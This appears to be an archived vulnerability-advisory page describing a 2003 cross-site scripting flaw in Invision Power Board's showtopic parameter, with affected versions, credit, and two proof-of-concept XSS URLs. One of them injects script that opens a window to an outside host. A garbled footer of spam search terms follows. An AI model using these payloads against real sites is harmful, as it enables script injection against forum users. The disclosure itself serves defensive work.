about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability


Title Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability
Published 2003-09-09-12:00AM
Updated 2004-03-01-03:46PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  The disclosure of this issue has been credited to Boy Bear <eyal067@walla.co.il>.
Vulnerable  Invision Power Services Invision Board 1.3 Final
Invision Power Services Invision Board 1.3
Invision Power Services Invision Board 1.2
Invision Power Services Invision Board 1.1.2
Invision Power Services Invision Board 1.1.1
Invision Power Services Invision Board 1.0.1
Invision Power Services Invision Board 1.0
Not Vulnerable  
Code   The following proof of concept was provided:

http://www.example.com/index.php?showtopic='>&lt;script&gt;window.open
(window.location.search.substring(79))
&lt;/script&gt;http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 18:17:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.zggj.n SMU Free Sex v WEB-MISC sex 3gp vi post nuke linux kern www.lt99.c trishaboth Www.Sex ta sex&am red hat 9. _Zen Cart Blue Coat Sexymove Saxygarls httpd 2.0. sex play NSM format www.xiaqo1 file uploa ip board 2 wap.sex89. NAKEDGRILS all cartoo NAKEDGRILS calnear.pl pornvideos Banglashi ivana video sexy Sextv1.tv VIDEO POR PORNOGRA sex grls w sexmoves.c New style Www.simo-c Regge SMF 1.1 RC news for c components Freehardco call girls woldsex.co {www.5iweb Horsesexhu jetty www.jzgly. 2.0.46